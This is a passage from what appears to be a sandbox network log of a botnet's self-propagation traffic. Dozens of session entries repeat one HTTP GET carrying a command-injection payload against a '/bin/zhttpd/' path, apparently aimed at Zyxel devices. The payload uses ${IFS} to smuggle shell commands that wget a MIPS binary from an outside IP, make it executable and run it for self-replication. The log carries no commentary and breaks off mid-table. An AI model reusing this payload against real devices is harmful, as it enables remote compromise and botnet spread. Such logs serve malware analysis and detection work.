                                                Jan 28, 2024 10:16:30.891598940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5738192.168.2.2351830205.74.97.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891604900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5739192.168.2.234889053.112.93.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891613960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5740192.168.2.234078859.243.224.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891649961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5741192.168.2.235198035.14.204.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891707897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5742192.168.2.235812685.200.7.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891716003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5743192.168.2.2353118131.120.34.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891737938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5744192.168.2.233758871.137.51.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891762018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5745192.168.2.234948435.100.185.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891788960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5746192.168.2.233611648.233.223.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891824961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5747192.168.2.233909045.108.157.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891846895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5748192.168.2.2349928201.142.240.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891869068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5749192.168.2.2357544180.38.112.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891876936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5750192.168.2.234512818.60.75.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891902924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5751192.168.2.2350826190.137.114.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891926050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5752192.168.2.2346904192.101.217.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891949892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5753192.168.2.2343238197.151.165.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891971111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5754192.168.2.2355354140.183.109.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892021894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5755192.168.2.2337748206.50.172.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892054081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5756192.168.2.2359826130.246.239.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892070055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5757192.168.2.2337308161.89.185.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892107010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5758192.168.2.2335976134.103.23.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892143965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5759192.168.2.2349448155.245.114.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892175913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5760192.168.2.2339480179.248.154.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892175913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5761192.168.2.2342050110.213.132.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892210960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5762192.168.2.2349978126.187.169.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892219067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5763192.168.2.2354192179.165.127.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892256021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5764192.168.2.234822067.127.37.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892291069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5765192.168.2.2336604223.124.121.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892311096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5766192.168.2.234813235.56.148.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892348051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5767192.168.2.2346294105.115.75.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892373085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5768192.168.2.233932839.239.212.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892425060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5769192.168.2.23475609.67.175.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892446995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5770192.168.2.2359870166.27.241.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892467022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5771192.168.2.2338302160.235.162.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892492056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5772192.168.2.2348106175.213.122.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892528057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5773192.168.2.235907661.155.154.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892576933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5774192.168.2.2355964107.31.179.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892587900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5775192.168.2.234688892.110.192.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892621040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5776192.168.2.23398842.16.251.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892632008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5777192.168.2.2348108181.28.112.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892657995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5778192.168.2.2353476147.166.74.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892683983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5779192.168.2.2333438148.241.19.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892707109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5780192.168.2.234715057.27.54.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892760038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5781192.168.2.2336620147.85.212.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892777920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5782192.168.2.2338830145.254.169.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892802000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5783192.168.2.235307683.36.174.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892848969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5784192.168.2.233401259.167.130.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892864943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5785192.168.2.235582888.186.195.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892890930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5786192.168.2.2357740216.172.19.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892894983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5787192.168.2.2356772194.248.164.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892906904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5788192.168.2.2337746152.220.160.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892982006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5789192.168.2.2349180174.178.132.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.892997026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5790192.168.2.2351538110.88.227.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893004894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5791192.168.2.23452121.93.100.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893042088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5792192.168.2.2338446143.56.75.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893065929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5793192.168.2.2356670223.104.144.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893111944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5794192.168.2.235855295.255.251.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893299103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5795192.168.2.234907638.27.13.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893317938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5796192.168.2.2334126184.192.73.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893351078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5797192.168.2.2343158158.227.127.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893377066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5798192.168.2.2339650187.130.30.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893414974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5799192.168.2.2347890201.168.22.93443
                                                TimestampBytes transferredDirectionData
